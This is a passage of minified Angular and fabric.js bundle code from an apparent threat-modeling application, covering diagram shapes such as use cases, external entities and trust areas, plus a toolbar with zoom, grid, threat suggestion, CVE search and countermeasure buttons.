e=a.transform.target,i=e._objects.find(Fe=>Fe[ot.myType]==wt.ElementBorder),n=e._objects.find(Fe=>Fe[ot.myType]==wt.ElementType),r=e._objects.find(Fe=>Fe[ot.myType]==wt.AppLabel1),c=e._objects.find(Fe=>Fe[ot.myType]==wt.AppLabel1Line),d=e._objects.find(Fe=>Fe[ot.myType]==wt.AppLabel2),T=e._objects.find(Fe=>Fe[ot.myType]==wt.AppLabel2Line),k=e._objects.find(Fe=>Fe[ot.myType]==wt.AppLabel3),q=e._objects.find(Fe=>Fe[ot.myType]==wt.AppLabel3Line),Y=e._objects.find(Fe=>Fe[ot.myType]==wt.AppLabel4),te=e._objects.find(Fe=>Fe[ot.myType]==wt.AppLabel4Line),pe=e.width*e.scaleX,Re=e.height*e.scaleY;i.set({height:Re,width:pe,scaleX:1,scaleY:1,left:-pe/2,top:-Re/2}),null==n||n.set({left:0,top:-Re/2+25}),null==r||r.set({left:-pe/2+20,top:0}),null==c||c.set({left:-pe/2+20,top:-Re/2,height:Re}),null==d||d.set({left:0,top:Re/2-16}),null==T||T.set({left:-pe/2,top:Re/2-20,width:pe}),null==k||k.set({left:pe/2,top:0}),null==q||q.set({left:pe/2-20,top:-Re/2,height:Re}),null==Y||Y.set({left:0,top:-Re/2+5}),null==te||te.set({left:-pe/2,top:-Re/2+20,width:pe}),this.onCanvasModified()}changeMobileAppInterfaceVisibility(a,e,i=!1){if(null==e&&(e=this.getCanvasElementByID(a.ID)),e){let n=e._objects.find(te=>te[ot.myType]==wt.AppLabel1),r=e._objects.find(te=>te[ot.myType]==wt.AppLabel1Line),c=e._objects.find(te=>te[ot.myType]==wt.AppLabel2),d=e._objects.find(te=>te[ot.myType]==wt.AppLabel2Line),T=e._objects.find(te=>te[ot.myType]==wt.AppLabel3),k=e._objects.find(te=>te[ot.myType]==wt.AppLabel3Line),q=e._objects.find(te=>te[ot.myType]==wt.AppLabel4),Y=e._objects.find(te=>te[ot.myType]==wt.AppLabel4Line);n.set("text",this.translate.instant(a.InterfaceLeft)),n.set(ot.visible,a.InterfaceLeft!=So.None&&!i),r.set(ot.visible,a.InterfaceLeft!=So.None&&!i),c.set("text",this.translate.instant(a.InterfaceBottom)),c.set(ot.visible,a.InterfaceBottom!=So.None&&!i),d.set(ot.visible,a.InterfaceBottom!=So.None&&!i),T.set("text",this.translate.instant(a.InterfaceRight)),T.set(ot.visible,a.InterfaceRight!=So.None&&!i),k.set(ot.visible,a.InterfaceRight!=So.None&&!i),null==q||q.set("text",this.translate.instant(a.InterfaceTop)),null==q||q.set(ot.visible,a.InterfaceTop!=So.None&&!i),null==Y||Y.set(ot.visible,a.InterfaceTop!=So.None&&!i),this.Canvas.requestRenderAll()}}createInteractor(a,e,i){let T=new Ei.fabric.Circle({left:35,top:22.5,radius:6,stroke:i instanceof Ts?this.theme.Primary:this.StrokeColor,strokeWidth:this.StrokeWidth,fill:"transparent",originX:"center",originY:"center",canvasID:Fo(),myType:wt.InteractorHead,selectable:!0,hasBorders:!1,hasControls:!1}),k=new Ei.fabric.Line([25,32.5,45,32.5],{stroke:i instanceof Ts?this.theme.Primary:this.StrokeColor,strokeWidth:this.StrokeWidth,myType:wt.InteractorArms}),q=new Ei.fabric.Line([33.5,28.5,33.5,42.5],{stroke:i instanceof Ts?this.theme.Primary:this.StrokeColor,strokeWidth:this.StrokeWidth,myType:wt.InteractorBody}),Y=new Ei.fabric.Line([34,37.5,25,52.5],{stroke:i instanceof Ts?this.theme.Primary:this.StrokeColor,strokeWidth:this.StrokeWidth,myType:wt.InteractorLeg1}),te=new Ei.fabric.Line([33,37.5,42,52.5],{stroke:i instanceof Ts?this.theme.Primary:this.StrokeColor,strokeWidth:this.StrokeWidth,myType:wt.InteractorLeg2}),pe=new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Name,fill:this.StrokeColor,originX:"center",left:35,top:65,textAlign:"center",myType:wt.ElementName}),Re=[T,k,q,Y,te,...this.createFlowAnchors(70,65,!0,!0),pe],Fe=new Ei.fabric.Group(Re,{left:a,top:e,hasControls:!0,lockRotation:!0,lockScalingX:!0,lockScalingY:!0,hasBorders:!1,ID:i.ID,canvasID:Fo(),myType:wt.Interactor,subTargetCheck:!0});return Fe.on("scaling",Ne=>this.onScaleInteractor(Ne)),Fe.setControlsVisibility({mtr:!1}),Fe}onScaleInteractor(a){}createInterface(a,e,i,n){const d=new Ei.fabric.Rect({stroke:this.StrokeColor,strokeWidth:this.StrokeWidth,left:12.5,top:12.5,width:25,height:25,fill:this.isDarkMode?D2.BackgroundColorDark:D2.BackgroundColorLight,myType:wt.ElementBorder});let T=null;"Interface1"==n&&(T=new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Name,fill:this.StrokeColor,originX:"center",left:25,top:-5,textAlign:"center",myType:wt.ElementName}));const k=[d,T,...this.createFlowAnchors(50,50,!0,!0,!1,!0)];4==this.AnchorCount&&[_i.NorthWest,_i.NorthEast,_i.SouthEast,_i.SouthWest].forEach(Y=>{var te;return null===(te=k.find(pe=>pe[ot.fa]==Y))||void 0===te?void 0:te.set(ot.visible,!1)});const q=new Ei.fabric.Group(k,{left:a,top:e,hasControls:!0,lockRotation:!0,lockScalingX:!0,lockScalingY:!0,hasBorders:!1,ID:i.ID,canvasID:Fo(),myType:wt.DeviceInterface,subTargetCheck:!0});return setTimeout(()=>{let Y=q._objects.find(Fe=>Fe[ot.myType]==wt.ElementBorder),Re=this.createTextPositionPoint("t0",q.left+q.width/2,q.top+q.height/2+Y.top-25,q);Re[ot.opacity]=0,q[ot.t0ID]=Re[ot.canvasID],this.Canvas.add(Re)},100),q.on("scaling",Y=>this.onScaleInterface(Y)),q.setControlsVisibility({mtr:!1}),q}createTextPositionPoint(a,e,i,n){var r=new Ei.fabric.Circle({left:e,top:i,radius:5,stroke:this.theme.Primary,fill:this.theme.Primary,originX:"center",originY:"center",name:a,canvasID:Fo(),myType:wt.TextPosPoint,selectable:!0,hasBorders:!1,hasControls:!1});return r[ot.textObjID]=n[ot.canvasID],r.setControlsVisibility({mtr:!1,mts:!1}),r}onScaleInterface(a){}createUseCase(a,e,i){let c=new Ei.fabric.Ellipse({stroke:this.StrokeColor,strokeWidth:this.StrokeWidth,width:140,height:50,rx:70,ry:25,fill:this.isDarkMode?D2.BackgroundColorDark:D2.BackgroundColorLight,myType:wt.ElementBorder}),d=new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Name,fill:this.StrokeColor,originX:"center",left:70,top:17,textAlign:"center",myType:wt.ElementName}),T=[c];T.push(d,...this.createFlowAnchors(140,50,!0,!0));let k=new Ei.fabric.Group(T,{left:a,top:e,hasControls:!0,lockRotation:!0,lockScalingX:!1,lockScalingY:!1,hasBorders:!1,ID:i.ID,canvasID:Fo(),myType:wt.SystemUseCase,subTargetCheck:!0});return k.on("scaling",q=>this.onScaleUseCase(q)),k.setControlsVisibility({mtr:!1}),k}onScaleUseCase(a){this.onScaleElement(a);let e=a.transform.target,i=e._objects.find(c=>c[ot.myType]==wt.ElementBorder),n=e.width*e.scaleX,r=e.height*e.scaleY;i.set({height:r,width:n,scaleX:1,scaleY:1,left:-n/2,top:-r/2,rx:n/2,ry:r/2}),this.onCanvasModified()}createExternalEntity(a,e,i){const k=[new Ei.fabric.Rect({stroke:i instanceof td?this.theme.Primary:this.StrokeColor,strokeWidth:this.StrokeWidth,width:140,height:75,fill:"transparent",myType:wt.ElementBorder}),new Ei.fabric.Text("\xabExternal Entity\xbb",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"center",left:70,top:5,myType:wt.ElementType}),new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Name,fill:this.StrokeColor,originX:"center",left:70,top:29.5,textAlign:"center",myType:wt.ElementName}),...this.createFlowAnchors(140,75,!0,!0,!1,!0)];4==this.AnchorCount&&[_i.NorthWest,_i.NorthEast,_i.SouthEast,_i.SouthWest].forEach(Y=>{var te;return null===(te=k.find(pe=>pe[ot.fa]==Y))||void 0===te?void 0:te.set(ot.visible,!1)});const q=new Ei.fabric.Group(k,{left:a,top:e,hasControls:!0,lockRotation:!0,lockScalingX:!1,lockScalingY:!1,hasBorders:!1,subTargetCheck:!0,ID:i.ID,canvasID:Fo(),myType:wt.SystemExternalEntity});return q.on("scaling",Y=>this.onScaleExternalEntity(Y)),q.setControlsVisibility({mtr:!1}),q}onScaleExternalEntity(a){this.onScaleElement(a);let e=a.transform.target,i=e._objects.find(c=>c[ot.myType]==wt.ElementBorder),n=e.width*e.scaleX,r=e.height*e.scaleY;i.set({height:r,width:n,scaleX:1,scaleY:1,left:-n/2,top:-r/2}),this.onCanvasModified()}createTrustArea(a,e,i,n=300,r=300){let c=new Ei.fabric.Rect({stroke:this.StrokeColor,strokeWidth:this.StrokeWidth,width:n,height:r,strokeDashArray:[10,5],fill:"transparent",myType:wt.ElementBorder}),d=new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"left",originY:"top",left:5,top:5,myType:wt.ElementName}),T=new Ei.fabric.Group([c,d],{left:a,top:e,hasControls:!0,hasBorders:!1,lockRotation:!0,ID:i.ID,canvasID:Fo(),elementTypeID:Et.LogTrustArea,myType:wt.TrustArea});return T.on("scaling",k=>this.onScaleTrustArea(k)),T.setControlsVisibility({mtr:!1}),T}onScaleTrustArea(a){this.onScaleElement(a);let e=a.transform.target,i=e._objects.find(d=>d[ot.myType]==wt.ElementBorder),n=e._objects.find(d=>d[ot.myType]==wt.ElementName),r=e.width*e.scaleX,c=e.height*e.scaleY;i.set({height:c,width:r,scaleX:1,scaleY:1,left:-r/2,top:-c/2}),n.set({left:-r/2+5,top:-c/2+5}),this.onCanvasModified()}}let glt=(()=>{class t{constructor(e,i,n,r,c){this.theme=e,this.dataService=i,this.dialog=n,this.locStorage=r,this.translate=c,this.faArrowsAltH=F$,this.faLongArrowAltRight=KX,this.menuTopLeftPosition={x:"0",y:"0"},this.selectionChanged=new Tt,this.navTreeChanged=new Tt}get Zoom(){if(this.Dia.Canvas){let e=this.Dia.Canvas.getZoom();return[.33,.5,.66,.75,1,1.5,2,2.5,3].includes(e)||(this.zoomSelect.nativeElement.selectedIndex=9),e}return null}set Zoom(e){this.Dia.SetZoom(e),this.locStorage.Set(si.PAGE_MODELING_DIAGRAM_ZOOM,e.toString())}get IsContextDiagram(){return this.diagram instanceof b2}get HasMnemonics(){return this.dataService.Config.GetStencilThreatMnemonics().length>0}get HasThreatRuleGroups(){var e;return(null===(e=this.GetThreatRuleGroups())||void 0===e?void 0:e.length)>0}get selectedElement(){var e;return null===(e=this.Dia)||void 0===e?void 0:e.SelectedElement}set selectedElement(e){this.Dia&&(this.Dia.SelectedElement=e)}ngOnInit(){var e;this.diagram&&this.diagram instanceof ns?(this.diagram instanceof Vg?this.Dia=new $T(this.diagram,this.dataService,this.theme,this.dialog,this.locStorage,this.translate):this.diagram instanceof b2&&(this.Dia=new R7(this.diagram,this.dataService,this.theme,this.dialog,this.locStorage,this.translate,null===(e=this.selectedNode)||void 0===e?void 0:e.dataType)),this.Dia.SelectionChanged.subscribe(i=>{this.selectionChanged.emit(i)}),this.Dia.NavTreeChanged.subscribe(()=>this.navTreeChanged.emit())):console.error("Undefined diagram")}onKeyDown(e){e.ctrlKey?"c"==e.key&&this.selectedElement&&"BODY"==document.activeElement.tagName?(e.preventDefault(),this.Dia.CopyElement()):"v"==e.key&&this.Dia.CanCopy&&"BODY"==document.activeElement.tagName&&(e.preventDefault(),this.Dia.PasteElement()):"Delete"==e.key&&this.selectedElement&&"BODY"==document.activeElement.tagName&&(e.preventDefault(),this.Dia.OnDeleteElement(this.selectedElement))}ngOnDestroy(){this.Dia.Save()}GetIconColor(e){return e?this.theme.IsDarkMode?"#FFF":"#000":this.theme.IsDarkMode?"#676767":"#B6B6B6"}GetContextIconColor(e){return e?this.theme.IsDarkMode?"#FFF":"#707070":this.theme.IsDarkMode?"#676767":"#B6B6B6"}ShowSuggestedThreats(){this.dialog.OpenSuggestThreatsDialog(this.selectedElement)}ShowCVESearch(){this.dialog.OpenCveSearchDialog(this.selectedElement,this.diagram.ID)}GetThreatRuleGroups(){let e=this.dataService.Config.GetThreatRuleGroups().filter(i=>{var n;return(null===(n=i.ThreatRules)||void 0===n?void 0:n.length)>0});return this.diagram.Settings.GenerationThreatLibrary&&(e=e.filter(i=>i.ThreatRules.every(n=>!n.IsActive))),e}OnResized(e,i){this.Dia.OnResized(e,i)}SetZoom(e){this.Zoom=Number(e.target.value)}OpenContextMenu(e){e.preventDefault(),this.menuTopLeftPosition.x=e.clientX+"px",this.menuTopLeftPosition.y=e.clientY+"px",this.matMenuTrigger.menuData={item:this.selectedElement},this.matMenuTrigger.openMenu()}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn),Ee(_r),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-diagram"]],viewQuery:function(e,i){if(1&e&&(Mi(Qct,5),Mi($ct,5)),2&e){let n;Vt(n=Bt())&&(i.matMenuTrigger=n.first),Vt(n=Bt())&&(i.zoomSelect=n.first)}},hostBindings:function(e,i){1&e&&he("keydown",function(r){return i.onKeyDown(r)},0,$c)},inputs:{selectedNode:"selectedNode",diagram:"diagram",selectedElement:"selectedElement"},outputs:{selectionChanged:"selectionChanged",navTreeChanged:"navTreeChanged"},decls:360,vars:176,consts:[[2,"width","100%","height","100%"],[1,"tools","mat-elevation-z8"],["mat-button","","matTooltipShowDelay","1000",1,"toolBtn",3,"matTooltip","click"],["mat-button","","matTooltipShowDelay","1000",1,"toolBtn",2,"margin-left","0px",3,"matTooltip","click"],["mat-button","","matTooltipShowDelay","1000",1,"toolBtn",3,"disabled","matTooltip","click"],["mat-button","","matTooltipShowDelay","1000",1,"toolBtn",3,"matMenuTriggerFor","matTooltip"],["gridMenu","matMenu"],["mat-menu-item",""],["color","primary",3,"ngModel","ngModelChange","click"],["color","primary",3,"disabled","ngModel","ngModelChange","click"],["xmlns","http://www.w3.org/2000/svg","width","25","height","25","version","1.1"],["cx","3","cy","3","r","2",4,"ngIf"],["cx","3","cy","20","r","2",4,"ngIf"],["cx","20","cy","3","r","2",4,"ngIf"],["cx","20","cy","20","r","2",4,"ngIf"],["cx","11.5","cy","3","r","2"],["cx","11.5","cy","20","r","2"],["cx","3","cy","11.5","r","2"],["cx","20","cy","11.5","r","2"],["mat-button","","class","toolBtn","matTooltipShowDelay","1000",3,"toolBtn-Selected","matTooltip","click",4,"ngIf"],["mat-button","","class","toolBtn","style","margin-left: 0px;","matTooltipShowDelay","1000",3,"toolBtn-Selected","matTooltip","click",4,"ngIf"],["textSizeMenu","matMenu"],["mat-menu-item","",2,"height","fit-content",3,"click"],["color","primary","value","1",3,"checked"],["color","primary","value","2",3,"checked"],["color","primary","value","3",3,"checked"],["color","primary","value","4",3,"checked"],["color","primary","value","5",3,"checked"],["mat-button","","class","toolBtn","matTooltipShowDelay","1000",3,"disabled","matTooltip","click",4,"ngIf"],["x","7.5","y","9","width","10","height","7","rx","3","ry","3","stroke-width","1"],["x","2.5","y","2.5","width","11","height","8","rx","3","ry","3","stroke-width","1.5"],["x","4.5","y","4.5","width","7","height","4","rx","2","ry","2","stroke-width","1.5"],["x","11.5","y","14.5","width","11","height","8","rx","3","ry","3","stroke-width","1.5"],["x","13.5","y","16.5","width","7","height","4","rx","2","ry","2","stroke-width","1.5"],["x","5","y","5","width","10","height","10","rx","3","ry","3","stroke-width","1"],["x","10","y","10","width","11","height","11","rx","3","ry","3","stroke-width","1.5"],["x","12","y","12","width","7","height","7","rx","2","ry","2","stroke-width","1.5"],["x","7.5","y","8.5","width","10","height","9","rx","3","ry","3","stroke-width","1"],["matBadgeColor","primary","matBadgeSize","small","matBadgePosition","below",2,"z-index","1",3,"matBadge","matBadgeHidden"],["x","1","y","1","width","23","height","23","rx","3","ry","3"],["x","2","y","16",1,"heavy"],["mat-button","","class","toolBtn","color","accent","matTooltipShowDelay","1000",3,"disabled","matTooltip","click",4,"ngIf"],["mat-button","","matTooltipShowDelay","1000",1,"toolBtn",2,"z-index","1",3,"matMenuTriggerFor","matTooltip"],["matBadge","G","matBadgeColor","primary","matBadgeSize","small","matBadgePosition","below"],["generationMenu","matMenu"],["mat-menu-item","",3,"matMenuTriggerFor",4,"ngIf"],["mat-menu-item","",3,"disabled","matMenuTriggerFor"],["mnemonics","matMenu"],["mat-menu-item","",4,"ngFor","ngForOf"],["ruleGroups","matMenu"],[2,"margin-right","5px","float","right","margin-top","3px",3,"value","change"],["zoomSelect",""],["value","0.33"],["value","0.5"],["value","0.66"],["value","0.75"],["value","1"],["value","1.5"],["value","2"],["value","2.5"],["value","3"],[3,"value",4,"ngIf"],["mat-button","","matTooltipShowDelay","1000",1,"toolBtn",2,"margin-right","5px","float","right",3,"matTooltip","click"],[1,"my-canvas",2,"width","100%","float","left","overflow","auto",3,"resized","mousedown","mouseup","contextmenu"],["cc",""],[2,"visibility","hidden","position","fixed",3,"matMenuTriggerFor"],["ctxMenu","matMenuTrigger"],["rightMenu","matMenu"],["matMenuContent",""],["cx","3","cy","3","r","2"],["cx","3","cy","20","r","2"],["cx","20","cy","3","r","2"],["cx","20","cy","20","r","2"],[3,"icon"],["mat-button","","color","accent","matTooltipShowDelay","1000",1,"toolBtn",3,"disabled","matTooltip","click"],["mat-menu-item","",3,"matMenuTriggerFor"],[3,"value"],[4,"ngIf"],["mat-menu-item","",3,"matMenuTriggerFor","click"],["saveImg","matMenu"],["style","margin-left: 20px; margin-right: 20px;",4,"ngIf"],["mat-menu-item","",3,"click"],["mat-menu-item","",3,"disabled","click"],["mat-menu-item","",3,"click",4,"ngIf"],[2,"margin-left","20px","margin-right","20px"]],template:function(e,i){if(1&e){const n=Ye();m(0,"div",0),s(1,"\n "),m(2,"div",1),s(3,"\n "),m(4,"button",2),he("click",function(){return i.Dia.SetMouse()}),oe(5,"translate"),s(6,"\n "),m(7,"mat-icon"),s(8,"mouse"),u(),s(9,"\n "),u(),s(10,"\n "),m(11,"button",3),he("click",function(){return i.Dia.SetPan()}),oe(12,"translate"),s(13,"\n "),m(14,"mat-icon"),s(15,"pan_tool"),u(),s(16,"\n "),u(),s(17,"\n "),m(18,"button",4),he("click",function(){return i.Dia.SetMove()}),oe(19,"translate"),s(20,"\n "),m(21,"mat-icon"),s(22,"highlight_alt"),u(),s(23,"\n "),u(),s(24,"\n "),m(25,"button",5),oe(26,"translate"),s(27,"\n "),m(28,"mat-icon"),s(29,"grid_4x4"),u(),s(30,"\n "),u(),s(31,"\n "),m(32,"mat-menu",null,6),s(34,"\n "),m(35,"button",7),s(36,"\n "),m(37,"mat-slide-toggle",8),he("ngModelChange",function(c){return i.Dia.ShowGrid=c})("click",function(c){return c.stopPropagation()}),s(38),oe(39,"translate"),u(),s(40,"\n "),u(),s(41,"\n "),m(42,"button",7),s(43,"\n "),m(44,"mat-slide-toggle",9),he("ngModelChange",function(c){return i.Dia.StickToGrid=c})("click",function(c){return c.stopPropagation()}),s(45),oe(46,"translate"),u(),s(47,"\n "),u(),s(48,"\n "),u(),s(49,"\n\n "),m(50,"button",4),he("click",function(){return i.Dia.AnchorCount=8==i.Dia.AnchorCount?4:8}),oe(51,"translate"),s(52,"\n "),fi(),m(53,"svg",10),s(54,"\n "),ne(55,Kct,1,1,"circle",11),s(56,"\n "),ne(57,Xct,1,1,"circle",12),s(58,"\n "),ne(59,Yct,1,1,"circle",13),s(60,"\n "),ne(61,Jct,1,1,"circle",14),s(62,"\n \n "),it(63,"circle",15),s(64,"\n "),it(65,"circle",16),s(66,"\n "),it(67,"circle",17),s(68,"\n "),it(69,"circle",18),s(70,"\n "),u(),s(71,"\n "),u(),s(72,"\n\n "),ne(73,elt,5,7,"button",19),s(74,"\n "),ne(75,tlt,5,6,"button",20),s(76,"\n "),ne(77,ilt,6,5,"button",19),s(78,"\n "),ne(79,alt,6,5,"button",19),s(80,"\n "),ln(),m(81,"button",5),oe(82,"translate"),s(83,"\n "),m(84,"mat-icon"),s(85,"format_size"),u(),s(86,"\n "),u(),s(87,"\n "),m(88,"mat-menu",null,21),s(90,"\n "),m(91,"button",22),he("click",function(){return i.Dia.FontSizeConfigIndex=1}),s(92,"\n "),m(93,"mat-radio-group"),s(94,"\n "),m(95,"mat-radio-button",23),s(96),oe(97,"translate"),u(),s(98,"\n "),u(),s(99,"\n "),u(),s(100,"\n "),m(101,"button",22),he("click",function(){return i.Dia.FontSizeConfigIndex=2}),s(102,"\n "),m(103,"mat-radio-group"),s(104,"\n "),m(105,"mat-radio-button",24),s(106),oe(107,"translate"),u(),s(108,"\n "),u(),s(109,"\n "),u(),s(110,"\n "),m(111,"button",22),he("click",function(){return i.Dia.FontSizeConfigIndex=3}),s(112,"\n "),m(113,"mat-radio-group"),s(114,"\n "),m(115,"mat-radio-button",25),s(116),oe(117,"translate"),u(),s(118,"\n "),u(),s(119,"\n "),u(),s(120,"\n "),m(121,"button",22),he("click",function(){return i.Dia.FontSizeConfigIndex=4}),s(122,"\n "),m(123,"mat-radio-group"),s(124,"\n "),m(125,"mat-radio-button",26),s(126),oe(127,"translate"),u(),s(128,"\n "),u(),s(129,"\n "),u(),s(130,"\n "),m(131,"button",22),he("click",function(){return i.Dia.FontSizeConfigIndex=5}),s(132,"\n "),m(133,"mat-radio-group"),s(134,"\n "),m(135,"mat-radio-button",27),s(136),oe(137,"translate"),u(),s(138,"\n "),u(),s(139,"\n "),u(),s(140,"\n "),u(),s(141,"\n "),ne(142,nlt,6,4,"button",28),s(143,"\n "),ne(144,olt,6,4,"button",28),s(145,"\n "),m(146,"button",4),he("click",function(){return i.Dia.SendToBack()}),oe(147,"translate"),s(148,"\n "),fi(),m(149,"svg",10),s(150,"\n "),it(151,"rect",29),s(152,"\n "),it(153,"rect",30),s(154,"\n "),it(155,"rect",31),s(156,"\n "),it(157,"rect",32),s(158,"\n "),it(159,"rect",33),s(160,"\n "),u(),s(161,"\n "),u(),s(162,"\n "),ln(),m(163,"button",4),he("click",function(){return i.Dia.SendBackwards()}),oe(164,"translate"),s(165,"\n "),fi(),m(166,"svg",10),s(167,"\n "),it(168,"rect",34),s(169,"\n "),it(170,"rect",35),s(171,"\n "),it(172,"rect",36),s(173,"\n "),u(),s(174,"\n "),u(),s(175,"\n "),ln(),m(176,"button",4),he("click",function(){return i.Dia.BringForward()}),oe(177,"translate"),s(178,"\n "),fi(),m(179,"svg",10),s(180,"\n "),it(181,"rect",35),s(182,"\n "),it(183,"rect",36),s(184,"\n "),it(185,"rect",34),s(186,"\n "),u(),s(187,"\n "),u(),s(188,"\n "),ln(),m(189,"button",4),he("click",function(){return i.Dia.BringToFront()}),oe(190,"translate"),s(191,"\n "),fi(),m(192,"svg",10),s(193,"\n "),it(194,"rect",30),s(195,"\n "),it(196,"rect",31),s(197,"\n "),it(198,"rect",32),s(199,"\n "),it(200,"rect",33),s(201,"\n "),it(202,"rect",37),s(203,"\n "),u(),s(204,"\n "),u(),s(205,"\n "),ln(),m(206,"button",4),he("click",function(){return i.Dia.AddAnnotation()}),oe(207,"translate"),s(208,"\n "),m(209,"mat-icon"),s(210,"edit"),u(),s(211,"\n "),u(),s(212,"\n "),s(213,"\n "),m(214,"button",4),he("click",function(){return i.Dia.SelectNextUninitObject()}),oe(215,"translate"),s(216,"\n "),m(217,"mat-icon",38),s(218,"update"),u(),s(219,"\n "),u(),s(220,"\n "),m(221,"button",4),he("click",function(){return i.ShowSuggestedThreats()}),oe(222,"translate"),s(223,"\n "),m(224,"mat-icon"),s(225,"flash_auto"),u(),s(226,"\n "),u(),s(227,"\n "),m(228,"button",4),he("click",function(){return i.Dia.AddThreat()}),oe(229,"translate"),s(230,"\n "),m(231,"mat-icon"),s(232,"flash_on"),u(),s(233,"\n "),u(),s(234,"\n "),m(235,"button",4),he("click",function(){return i.ShowCVESearch()}),oe(236,"translate"),s(237,"\n "),s(238,"\n "),fi(),m(239,"svg",10),s(240,"\n "),it(241,"rect",39),s(242,"\n "),m(243,"text",40),s(244,"CVE"),u(),s(245,"\n "),u(),s(246,"\n "),u(),s(247,"\n "),ne(248,rlt,6,4,"button",28),s(249,"\n "),ln(),m(250,"button",4),he("click",function(){return i.Dia.AddCountermeasure()}),oe(251,"translate"),s(252,"\n "),m(253,"mat-icon"),s(254,"security"),u(),s(255,"\n "),u(),s(256,"\n "),ne(257,slt,6,4,"button",41),s(258,"\n "),m(259,"button",42),oe(260,"translate"),s(261,"\n "),m(262,"mat-icon",43),s(263,"settings"),u(),s(264,"\n "),u(),s(265,"\n "),m(266,"mat-menu",null,44),s(268,"\n "),m(269,"button",7),s(270,"\n "),m(271,"mat-slide-toggle",8),he("ngModelChange",function(c){return i.diagram.Settings.GenerationThreatLibrary=c})("click",function(c){return c.stopPropagation()}),s(272),oe(273,"translate"),u(),s(274,"\n "),u(),s(275,"\n "),ne(276,clt,2,1,"button",45),s(277,"\n "),m(278,"button",46),s(279),oe(280,"translate"),u(),s(281,"\n "),m(282,"button",7),s(283,"\n "),m(284,"mat-slide-toggle",8),he("ngModelChange",function(c){return i.diagram.Settings.GenerationAssetBased=c})("click",function(c){return c.stopPropagation()}),s(285),oe(286,"translate"),u(),s(287,"\n "),u(),s(288,"\n "),m(289,"mat-menu",null,47),s(291,"\n "),ne(292,llt,5,2,"button",48),s(293,"\n "),u(),s(294,"\n "),m(295,"mat-menu",null,49),s(297,"\n "),ne(298,dlt,5,2,"button",48),s(299,"\n "),u(),s(300,"\n "),u(),s(301,"\n "),s(302,"\n "),m(303,"select",50,51),he("change",function(c){return i.SetZoom(c)}),s(305,"\n "),m(306,"option",52),s(307,"33%"),u(),s(308,"\n "),m(309,"option",53),s(310,"50%"),u(),s(311,"\n "),m(312,"option",54),s(313,"66%"),u(),s(314,"\n "),m(315,"option",55),s(316,"75%"),u(),s(317,"\n "),m(318,"option",56),s(319,"100%"),u(),s(320,"\n "),m(321,"option",57),s(322,"150%"),u(),s(323,"\n "),m(324,"option",58),s(325,"200%"),u(),s(326,"\n "),m(327,"option",59),s(328,"250%"),u(),s(329,"\n "),m(330,"option",60),s(331,"300%"),u(),s(332,"\n "),ne(333,mlt,3,5,"option",61),s(334,"\n "),u(),s(335,"\n "),m(336,"button",62),he("click",function(){return i.Dia.FitToCanvas(i.Dia.CanvasScreenWidth,i.Dia.CanvasScreenHeight)}),oe(337,"translate"),s(338,"\n "),m(339,"mat-icon"),s(340,"fit_screen"),u(),s(341,"\n "),u(),s(342,"\n "),u(),s(343,"\n "),m(344,"div",63,64),he("resized",function(c){be(n);const d=Ti(345);return Me(i.Dia.OnResized(c,d))})("mousedown",function(c){return i.Dia.OnOuterCanvasMouseDown(c)})("mouseup",function(c){return i.Dia.OnOuterCanvasMouseUp(c)})("contextmenu",function(c){return i.OpenContextMenu(c)}),s(346,"\n "),s(347,"\n "),s(348,"\n "),u(),s(349,"\n\n "),it(350,"div",65,66),s(352," \n "),m(353,"mat-menu",null,67),s(355," \n "),ne(356,plt,24,9,"ng-template",68),s(357," \n "),u(),s(358," \n"),u(),s(359,"\n")}if(2&e){const n=Ti(33),r=Ti(89),c=Ti(267),d=Ti(296),T=Ti(354);g(2),Ct("bg-color-light2",!i.theme.IsDarkMode)("bg-color-dark2",i.theme.IsDarkMode),g(2),Ct("toolBtn-Selected","mouse"==i.Dia.MouseMode),at("matTooltip",re(5,119,"pages.modeling.diagram.mouse")),g(7),Ct("toolBtn-Selected","pan"==i.Dia.MouseMode),at("matTooltip",re(12,121,"pages.modeling.diagram.pan")),g(7),Ct("toolBtn-Selected","move"==i.Dia.MouseMode),at("matTooltip",re(19,123,"pages.modeling.diagram.move")),F("disabled",!0),g(7),at("matTooltip",re(26,125,"pages.modeling.diagram.grid")),F("matMenuTriggerFor",n),g(12),F("ngModel",i.Dia.ShowGrid),g(1),ct("\n ",re(39,127,"pages.modeling.diagram.showGrid"),"\n "),g(6),F("disabled",!i.Dia.ShowGrid)("ngModel",i.Dia.StickToGrid),g(1),ct("\n ",re(46,129,"pages.modeling.diagram.stickToGrid"),"\n "),g(5),at("matTooltip",re(51,131,8==i.Dia.AnchorCount?"pages.modeling.diagram.anchorCount8":"pages.modeling.diagram.anchorCount4")),F("disabled",!i.Dia.CanSetAnchorCount),g(5),F("ngIf",8==i.Dia.AnchorCount),g(2),F("ngIf",8==i.Dia.AnchorCount),g(2),F("ngIf",8==i.Dia.AnchorCount),g(2),F("ngIf",8==i.Dia.AnchorCount),g(2),Rt("fill",i.GetIconColor(i.Dia.CanSetAnchorCount)),g(2),Rt("fill",i.GetIconColor(i.Dia.CanSetAnchorCount)),g(2),Rt("fill",i.GetIconColor(i.Dia.CanSetAnchorCount)),g(2),Rt("fill",i.GetIconColor(i.Dia.CanSetAnchorCount)),g(4),F("ngIf","HW"!=i.Dia.Diagram.DiagramType),g(2),F("ngIf","HW"!=i.Dia.Diagram.DiagramType),g(2),F("ngIf","HW"!=i.Dia.Diagram.DiagramType),g(2),F("ngIf","HW"!=i.Dia.Diagram.DiagramType),g(2),at("matTooltip",re(82,133,"pages.modeling.diagram.textFormatSize")),F("matMenuTriggerFor",r),g(14),F("checked",1==i.Dia.FontSizeConfigIndex),g(1),ke(re(97,135,"pages.modeling.diagram.fs.textSmaller")),g(9),F("checked",2==i.Dia.FontSizeConfigIndex),g(1),ke(re(107,137,"pages.modeling.diagram.fs.textSmall")),g(9),F("checked",3==i.Dia.FontSizeConfigIndex),g(1),ke(re(117,139,"pages.modeling.diagram.fs.textNormal")),g(9),F("checked",4==i.Dia.FontSizeConfigIndex